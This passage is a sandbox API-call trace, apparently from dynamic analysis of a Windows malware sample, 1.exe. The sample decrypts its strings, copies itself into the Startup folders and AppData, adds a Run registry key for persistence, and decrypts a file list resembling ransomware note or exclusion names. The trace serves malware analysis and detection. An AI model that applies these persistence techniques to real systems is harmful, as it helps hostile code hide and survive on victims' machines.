returned 0x0 [0134.270] RegQueryValueExW (in: hKey=0x250, lpValueName="Common Startup", lpReserved=0x0, lpType=0xd6fc68, lpData=0x2cb44a8, lpcbData=0xd6fc70*=0x5a | out: lpType=0xd6fc68*=0x2, lpData=0x2cb44a8*=0xc0, lpcbData=0xd6fc70*=0x78) returned 0xea [0134.270] RegCloseKey (hKey=0x250) returned 0x0 [0134.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12a8 | out: hHeap=0x2cb0000) returned 1 [0134.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1498 | out: hHeap=0x2cb0000) returned 1 [0134.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0134.270] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb1398, Size=0x1e2) returned 0x2cb4410 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e2) returned 0x2cb4600 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb1398 [0134.271] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc74, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcdc | out: phKey=0xd6fcdc*=0x1327358) returned 1 [0134.271] CryptSetKeyParam (hKey=0x1327358, dwParam=0x1, pbData=0xd6fcc4, dwFlags=0x0) returned 1 [0134.271] CryptDecrypt (in: hKey=0x1327358, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1398, pdwDataLen=0xd6fc90 | out: pbData=0x2cb1398, pdwDataLen=0xd6fc90) returned 1 [0134.271] CryptDestroyKey (hKey=0x1327358) returned 1 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x10) returned 0x2cb12a8 [0134.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xd6fc58 | out: phkResult=0xd6fc58*=0x250) returned 0x0 [0134.271] RegQueryValueExW (in: hKey=0x250, lpValueName="Startup", lpReserved=0x0, lpType=0xd6fc54, lpData=0x2cb4600, lpcbData=0xd6fc5c*=0x1e2 | out: lpType=0xd6fc54*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xd6fc5c*=0x98) returned 0x0 [0134.271] RegCloseKey (hKey=0x250) returned 0x0 [0134.271] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12a8 | out: hHeap=0x2cb0000) returned 1 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb12a8 [0134.271] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xd6fc58 | out: phkResult=0xd6fc58*=0x250) returned 0x0 [0134.271] RegQueryValueExW (in: hKey=0x250, lpValueName="Common Startup", lpReserved=0x0, lpType=0xd6fc54, lpData=0x2cb4698, lpcbData=0xd6fc5c*=0x14a | out: lpType=0xd6fc54*=0x0, lpData=0x2cb4698*=0x0, lpcbData=0xd6fc5c*=0x14a) returned 0x2 [0134.271] RegCloseKey (hKey=0x250) returned 0x0 [0134.271] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0xd6fc6c | out: phkResult=0xd6fc6c*=0x250) returned 0x0 [0134.271] RegQueryValueExW (in: hKey=0x250, lpValueName="Common Startup", lpReserved=0x0, lpType=0xd6fc68, lpData=0x2cb4698, lpcbData=0xd6fc70*=0x14a | out: lpType=0xd6fc68*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0xd6fc70*=0x78) returned 0x0 [0134.271] RegCloseKey (hKey=0x250) returned 0x0 [0134.271] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12a8 | out: hHeap=0x2cb0000) returned 1 [0134.271] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1398 | out: hHeap=0x2cb0000) returned 1 [0134.271] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpDst=0x2cb4410, nSize=0xf1 | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup;C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x8b [0134.271] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4600 | out: hHeap=0x2cb0000) returned 1 [0134.271] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1350 | out: hHeap=0x2cb0000) returned 1 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4600 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4818 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4a30 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4c48 [0134.271] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cb4600, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.271] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4e60 [0134.272] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cb4e60, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.272] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4e60 | out: hHeap=0x2cb0000) returned 1 [0134.272] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4e60 [0134.272] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cb4e60, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.272] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4e60 | out: hHeap=0x2cb0000) returned 1 [0134.272] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\1.exe"), bFailIfExists=0) returned 1 [0134.295] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0xd6fd70 | out: phkResult=0xd6fd70*=0x0) returned 0x5 [0134.296] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0xd6fd5c | out: phkResult=0xd6fd5c*=0x250) returned 0x0 [0134.296] RegSetValueExW (in: hKey=0x250, lpValueName="1", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe", cbData=0x46 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\1.exe") returned 0x0 [0134.296] RegCloseKey (hKey=0x250) returned 0x0 [0134.296] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x118) returned 0x2cb1350 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.296] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.297] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.298] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.299] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] GetLastError () returned 0x0 [0134.300] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), lpNewFileName="c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), bFailIfExists=1) returned 0 [0134.301] CopyFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), lpNewFileName="c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\1.exe"), bFailIfExists=1) returned 0 [0134.301] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1350 | out: hHeap=0x2cb0000) returned 1 [0134.301] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4600 | out: hHeap=0x2cb0000) returned 1 [0134.301] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4818 | out: hHeap=0x2cb0000) returned 1 [0134.301] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4a30 | out: hHeap=0x2cb0000) returned 1 [0134.301] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4c48 | out: hHeap=0x2cb0000) returned 1 [0134.301] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0134.301] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12d0 | out: hHeap=0x2cb0000) returned 1 [0134.301] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4410 | out: hHeap=0x2cb0000) returned 1 [0134.301] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb1240 [0134.301] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcd4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd3c | out: phKey=0xd6fd3c*=0x1327658) returned 1 [0134.301] CryptSetKeyParam (hKey=0x1327658, dwParam=0x1, pbData=0xd6fd24, dwFlags=0x0) returned 1 [0134.301] CryptDecrypt (in: hKey=0x1327658, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0xd6fcf0 | out: pbData=0x2cb1240, pdwDataLen=0xd6fcf0) returned 1 [0134.302] CryptDestroyKey (hKey=0x1327658) returned 1 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cb1268 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cb1290 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb12b8 [0134.302] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd14 | out: phKey=0xd6fd14*=0x1327598) returned 1 [0134.302] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fcfc, dwFlags=0x0) returned 1 [0134.302] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb12b8, pdwDataLen=0xd6fcc8 | out: pbData=0x2cb12b8, pdwDataLen=0xd6fcc8) returned 1 [0134.302] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.302] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb12b8 | out: hHeap=0x2cb0000) returned 1 [0134.302] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cb1268, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0134.302] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1290 | out: hHeap=0x2cb0000) returned 1 [0134.302] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 [0134.302] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xd6fd7c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xd6fd7c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.302] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1268 | out: hHeap=0x2cb0000) returned 1 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x28) returned 0x2cb1240 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb1270 [0134.302] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcb8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd20 | out: phKey=0xd6fd20*=0x1327598) returned 1 [0134.302] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fd08, dwFlags=0x0) returned 1 [0134.302] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1270, pdwDataLen=0xd6fcd4 | out: pbData=0x2cb1270, pdwDataLen=0xd6fcd4) returned 1 [0134.302] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x60) returned 0x2cb1288 [0134.302] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fcb0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fd18 | out: phKey=0xd6fd18*=0x1327418) returned 1 [0134.302] CryptSetKeyParam (hKey=0x1327418, dwParam=0x1, pbData=0xd6fd00, dwFlags=0x0) returned 1 [0134.302] CryptDecrypt (in: hKey=0x1327418, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1288, pdwDataLen=0xd6fccc | out: pbData=0x2cb1288, pdwDataLen=0xd6fccc) returned 1 [0134.302] CryptDestroyKey (hKey=0x1327418) returned 1 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x56) returned 0x2cb12f0 [0134.302] RtlReAllocateHeap (Heap=0x2cb0000, Flags=0x0, Ptr=0x2cb12f0, Size=0xaa) returned 0x2cb12f0 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb13a8 [0134.302] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x180) returned 0x2cb13c0 [0134.302] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc80, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fce8 | out: phKey=0xd6fce8*=0x1327058) returned 1 [0134.302] CryptSetKeyParam (hKey=0x1327058, dwParam=0x1, pbData=0xd6fcd0, dwFlags=0x0) returned 1 [0134.302] CryptDecrypt (in: hKey=0x1327058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13c0, pdwDataLen=0xd6fc9c | out: pbData=0x2cb13c0, pdwDataLen=0xd6fc9c) returned 1 [0134.303] CryptDestroyKey (hKey=0x1327058) returned 1 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x220) returned 0x2cb4410 [0134.303] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc78, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fce0 | out: phKey=0xd6fce0*=0x13273d8) returned 1 [0134.303] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0xd6fcc8, dwFlags=0x0) returned 1 [0134.303] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4410, pdwDataLen=0xd6fc94 | out: pbData=0x2cb4410, pdwDataLen=0xd6fc94) returned 1 [0134.303] CryptDestroyKey (hKey=0x13273d8) returned 1 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4638 [0134.303] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcb8 | out: phKey=0xd6fcb8*=0x13272d8) returned 1 [0134.303] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0xd6fca0, dwFlags=0x0) returned 1 [0134.303] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4638, pdwDataLen=0xd6fc6c | out: pbData=0x2cb4638, pdwDataLen=0xd6fc6c) returned 1 [0134.303] CryptDestroyKey (hKey=0x13272d8) returned 1 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x84) returned 0x2cb46d0 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x84) returned 0x2cb4760 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb47f0 [0134.303] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fc90 | out: phKey=0xd6fc90*=0x1327598) returned 1 [0134.303] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0xd6fc78, dwFlags=0x0) returned 1 [0134.303] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb47f0, pdwDataLen=0xd6fc44 | out: pbData=0x2cb47f0, pdwDataLen=0xd6fc44) returned 1 [0134.303] CryptDestroyKey (hKey=0x1327598) returned 1 [0134.303] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb47f0 | out: hHeap=0x2cb0000) returned 1 [0134.303] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x2cb46d0, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0134.303] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4760 | out: hHeap=0x2cb0000) returned 1 [0134.303] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4638 | out: hHeap=0x2cb0000) returned 1 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb4638 [0134.303] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fcb4 | out: phKey=0xd6fcb4*=0x13271d8) returned 1 [0134.303] CryptSetKeyParam (hKey=0x13271d8, dwParam=0x1, pbData=0xd6fc9c, dwFlags=0x0) returned 1 [0134.303] CryptDecrypt (in: hKey=0x13271d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4638, pdwDataLen=0xd6fc68 | out: pbData=0x2cb4638, pdwDataLen=0xd6fc68) returned 1 [0134.303] CryptDestroyKey (hKey=0x13271d8) returned 1 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x18) returned 0x2cb4660 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x18) returned 0x2cb4680 [0134.303] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb4760 [0134.303] CryptImportKey (in: hProv=0x12f68a8, pbData=0xd6fc24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xd6fc8c | out: phKey=0xd6fc8c*=0x1327418) returned 1 [0134.303] CryptSetKeyParam (hKey=0x1327418, dwParam=0x1, pbData=0xd6fc74, dwFlags=0x0) returned 1 [0134.303] CryptDecrypt (in: hKey=0x1327418, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb4760, pdwDataLen=0xd6fc40 | out: pbData=0x2cb4760, pdwDataLen=0xd6fc40) returned 1 [0134.303] CryptDestroyKey (hKey=0x1327418) returned 1 [0134.303] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4760 | out: hHeap=0x2cb0000) returned 1 [0134.303] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;", lpDst=0x2cb4660, nSize=0xc | out: lpDst="C:\\Windows;") returned 0xc [0134.303] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4680 | out: hHeap=0x2cb0000) returned 1 [0134.303] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4638 | out: hHeap=0x2cb0000) returned 1 [0134.304] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4760 [0134.304] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb4978 [0134.304] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cb4978, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0134.304] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb4978 | out: hHeap=0x2cb0000) returned 1 [0134.304] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x174) returned 0x2cb4978 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.304] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] GetLastError () returned 0x0 [0134.305] 